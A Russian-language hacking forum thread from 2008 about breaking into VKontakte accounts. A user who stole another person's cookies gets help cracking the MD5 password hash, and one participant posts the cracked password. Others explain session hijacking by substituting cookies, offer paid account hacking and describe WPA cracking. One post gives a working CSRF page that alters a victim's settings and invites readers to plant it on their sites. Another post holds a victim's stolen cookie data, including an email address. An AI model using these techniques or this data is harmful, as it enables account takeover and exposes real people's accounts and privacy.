RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-29 23:38:21.080000
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Украдены Cookies:), как вытащить оттуда пароль?Пробовала программу MD5Inside,вообще ничего не понятно..Кто-нить может объяснить ПО-РУССКИ,как сиё сделать? мерси:)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-30 05:17:47.113333
|
|
|
:Useroff:
Сообщений: 210
Оценки: 0
Присоединился: 2008-02-07 00:53:52.023333
|
quote:
Украдены Cookies, как вытащить оттуда пароль?Пробовала программу MD5Inside,вообще ничего не понятно..Кто-нить может объяснить ПО-РУССКИ,как сиё сделать? мерси
:D:D:D
1) В куках нет пароля
2) MD5Inside эт для фрутформа на MD5 шифр
3) Ты блокдинко чтоли?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-06-30 13:05:40.813333
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
1)А это тогда что?:remixpass
b04e2fe32d215c82ca6ab0698d1a4f36
2)Понятно[sm=ac.gif]
3)Нет,я не блондинко.Если человек не разбирается в том,в чем разбираетесь Вы,это не значит,что он тупой![sm=ao.gif]
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-02 06:23:54.210000
|
|
|
:Useroff:
Сообщений: 210
Оценки: 0
Присоединился: 2008-02-07 00:53:52.023333
|
хм…
Еще негде невидел пароль в куках[sm=bl.gif]
Попробуй PasswordsPro
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-02 08:38:29.123333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
quote:
ORIGINAL: Lindt
1)А это тогда что?:remixpass
b04e2fe32d215c82ca6ab0698d1a4f36
MD5 хеш. Есть много сайтов с базами по его расшифровки. MD5Inside отличная прога, но без словарей не катит. Можно, конечно, полным перебором, но со словарями намного быстрей.
P.S. Если знаешь ящик, зачем тебе этот хеш расшифровывать? Изменил куки и все!!!
P.S.S. Посмотри свои куки, все поимешь, если с головой дружишь. Используй Оперу.
quote:
ORIGINAL: Lindt
Украдены Cookies:)
Как достал?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-08 22:39:45.566666
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Блин…я попробую конечно..
А куки с компа утащила))
Я не могу подменить куки,за тот комп мне больше не попасть((
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-09 14:53:50.850000
|
|
|
Raybeck
Сообщений: 38
Оценки: 0
Присоединился: 2008-07-09 13:28:46.943333
|
иМхо все вышеописанное можно сделать ручками. Кому интересно пишите в асю обьясню как.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-09 22:30:38.330000
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Дай номер аси-напишу))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-09 22:30:47.500000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Контактские куки кажись солёные
Кстати getURL нифига не лочат ещё, отличненько ходит куда надо, мимо страницы редиректа
Вот какой-то школьник уже заюзал
quote:
Andrey Gakov написал
9 июля 2008 в 20:51 http://vkontakte.ru/apps.php?act=s&id=146345
Другой внешний вид или скин вконтакте
Вконтакте с наворотами уже 5!!!!!!!!!!!!!!!!!!
Меню кнопок изменено
Встроен чат
Добавлены цитаты Bash!!!!!!!!!!!!!!!!!!
Улучшаем внешний вид. Теперь логотип 3d.
Спам в отместку тем кто пишет что мы воруем пароли. Совсем гады страх потеряли. Сто раз говорилось что паролей вводить не надо. В Опере и Фаефоксе все работает. А если кривовой Експлорер который нихрена дыр не видит не может понять что страница расположена на сервере вконтакте он дибил. Да и если его сперва настроить паролей просить не будет. Мой друг прграммер уже готовит доклад в майкрософт.
флешка эта ходит на _http://cs1355.vkontakte.ru.googlepages.com/5vkontakte.ru.htm?q=vkontakte.ru&%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20www.http://vkontakte.ru (ох и любят они прикрываться googlepages :D), на том сайте какая-то страшная хрень с кучей фреймов, в которых, в свою очередь, народные страницы с ифреймами, вообщем хз, в IE может и прокатит
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-10 23:41:21.173333
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Так кто-нить знает,что можно сделать?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-11 09:47:31.910000
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
http://vkontakte.ru/club3806937 )))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-11 22:38:24.490000
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Я спросила,кто может помочь расшифровать пароль из куков…(((ну ребятки,помогите плииииз)))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-12 01:12:36.850000
|
|
|
dropt
Сообщений: 11
Оценки: 0
Присоединился: 2008-07-12 00:36:33.336666
|
quote:
ORIGINAL: _~eXe~_
Ну вообще то я уже нашел прогу с помощью которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)
улыбнуло-молодцы, спасибо..со вкусом))
А вот вопрос просмотра закрытых фоток уже сложнее!
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-12 09:19:15.086666
|
|
|
Booom
Сообщений: 1
Оценки: 0
Присоединился: 2008-07-12 09:16:55.976666
|
Взломаю практически любую страничку с вероятностью 70 процентов. разумеется не бесплатно. Стучите в асю 390973650
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-13 16:47:52.203333
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
quote:
Я спросила,кто может помочь расшифровать пароль из куков…(((ну ребятки,помогите плииииз)))
а зачем тибе проль так входи)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-13 22:51:50.020000
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Как????Я не знаю….(((
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-14 00:43:45.583333
|
|
|
TurboXaker
Сообщений: 385
Оценки: 0
Присоединился: 2008-05-23 01:05:40.516666
|
подставляй чужие куки. а если тот самый хеш берется не только от пароля но еще и от айпишника жертвы (неплохая защита от угона куки), а у тебя другой айпишник, то извини, но помочь тебе будет крайне сложно
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-14 06:08:50.163333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
quote:
ORIGINAL: Lindt
Я спросила,кто может помочь расшифровать пароль из куков…(((ну ребятки,помогите плииииз)))
quote:
Есть много сайтов с базами по его расшифровки, напимер http://hashcracking.info/index.php. MD5Inside отличная прога для расшифровки пароля из хеша.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-14 09:13:45.400000
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
ну както легче просто вставить куки вместо своих вам не кажется ? в опере это делается так….- Инструменты\Дополнительно\cookies
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-14 14:57:34.773333
|
|
|
TurboXaker
Сообщений: 385
Оценки: 0
Присоединился: 2008-05-23 01:05:40.516666
|
quote:
ну както легче просто вставить куки вместо своих вам не кажется
ну что ты получишь если хеш берется не от строки пароля, а от строки пароль + IP?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-15 11:54:52.903333
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Вконтакт с того компа,с которого я сперла:Dкуки, заходили через анонимный прокси сервер.Это что-то меняет?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-15 14:40:30.323333
|
|
|
StasODIN
Сообщений: 92
Оценки: 0
Присоединился: 2008-06-18 21:13:39.653333
|
Меняет, если ты зайдешь с таковоже ip, + куки
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-15 17:28:49.810000
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
quote:
ну что ты получишь если хеш берется не от строки пароля, а от строки пароль + IP?
Куки для вконтакта дома и на работе одинаковы.
Если заменить свои куки от вконтакте, на те которые Вы заполучили, то Вы зайдёте на вконтакт под пользователем этих кукисов. Все просто.
Если Вы смогли узнать
"remixpass b04e2fe32d215c82ca6ab0698d1a4f36 ",
то что у Вас не получаеться с заменой?
Скажите какой браузер Вы используете, возможно это поможет ответить Ваш вопрос.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-15 18:58:12.343333
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
Солнышко, попробуй "000hip" :)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-15 22:52:26.513333
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
KentOne-как ты это сделал???Пароль верный!)))))вау!
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-16 10:14:17.130000
|
|
|
Doublev
Сообщений: 183
Оценки: 0
Присоединился: 2007-01-06 00:33:28.570000
|
:D:D:D
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-16 12:37:47.670000
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
Lindt: существуют базы хешей md5 для паролей до 8 символов включительно. В свободном доступе - до 6 символов включительно (как раз Ваш вариант) или до 8 символов из набора "0".."9".
Именно поэтому пароль должен состоять не менее чем из 9 символов и должен содержать не только цифры.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-16 14:12:32.610000
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
KentOne-я,понимаете ли,как бы это сказать….ламер)))и сама,наверное,никогда бы не расшифровала этот пароль…..
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-16 15:05:44.013333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
блин замени просто свои куки другими а потом зайди в контакт
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-16 22:42:07.616666
|
|
|
radeonekb
Сообщений: 180
Оценки: 0
Присоединился: 2008-06-17 23:10:07.733333
|
поднемаю тему /\
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-17 03:28:04.240000
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
http://forum.xakep.ru/m_1163740/tm.htm
в посте № 9 рассказываеться как изменить "Предложение" вконтакте, разместив определенный скрипт на сайте, куда должен зайти владелец акаунта вконтакте.
ИМХО: так можно не только "Предложение" менять…
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-17 09:24:27.906666
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
Lindt, я не понял у ти получилось ?
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-17 13:54:12.140000
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
Пример для изменения параметров страницы пользователя вконтакте
<html>
<head>
<title>Hello world</title>
<script src="http://vkontakte.ru/matches.php?act=a_save&question=play with me"></script> //изменяет Ваше "Предложение"
<script src="http://vkontakte.ru/settings.php?act=change_language&language=777"></script>//изменяет язык на "ностальгический" :), вместо 777 еще проходит 0(рус), 1(укр), 3(eng)
</head>
</html>
для того, чтобы проверить работоспособность, скопируйте код в текстовый файл, обозвите его, например, "1.htm", откройте в браузере при открытой странице вконтакта.
Если нравится, смело добавляйте код на своем сайте;)
Derek_RED, пароль был из 6 символов, хеши md5 для таких паролей известны.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-17 17:58:27.020000
|
|
|
Majanzev8
Сообщений: 6
Оценки: 0
Присоединился: 2008-07-17 15:52:33.706666
|
А кто то знает как повысить рейтинг страницы? Чтоб не платить как уних там написсано
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-17 22:20:04.583333
|
|
|
Lindt
Сообщений: 22
Оценки: 0
Присоединился: 2008-06-20 20:12:09.790000
|
Derek_RED:ну да,получилось..))Мне же KentOne расшифровал пароль,за что ему огромное человеческое СПАСИБО!)))))
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-18 10:23:15.173333
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
а понятно :)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-19 01:19:51.233333
|
|
|
BigIron
Сообщений: 898
Оценки: 0
Присоединился: 2007-05-13 18:53:43.593333
|
Если куки стащены с прогулки по вайфаю - то от имени жертвы туда можно без проблем зайти через ту-же дыру.
И ненадо ничего мудрить, вай-фай точки доступа сейчас почти все себе рано или поздно ставят!
А ломануть даже впа не так уж и сложно(особенно если от дома не слишком далеко и чердак выше других домов - можно хоть тарелку поставить, а с тарелкой проверяли - до 60-65 км в прямой видимости, 11 мегабит, ну это правда с усилителем…)
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-22 19:45:33.980000
|
|
|
Derek_RED
Сообщений: 235
Оценки: 0
Присоединился: 2008-03-16 16:29:54.476666
|
отлично я тож куки сащил!!! дарю вам на потрашение !!!
5
hooligan420%40rambler.ru
14904598
363687809642f1ce2ce86d6afce7d17e
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-23 00:11:11.430000
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
А как ты куки стащил? если не секрет.
|
|
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2008-07-23 00:18:23.836666
|
|
|
xaxa89
Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000
|
иди туда -> http://hashkiller.com или http://md5.xek.cc/ там все понятно….. что делать с тем хешем который у тя есть!!!
|
|
|
|
|
|
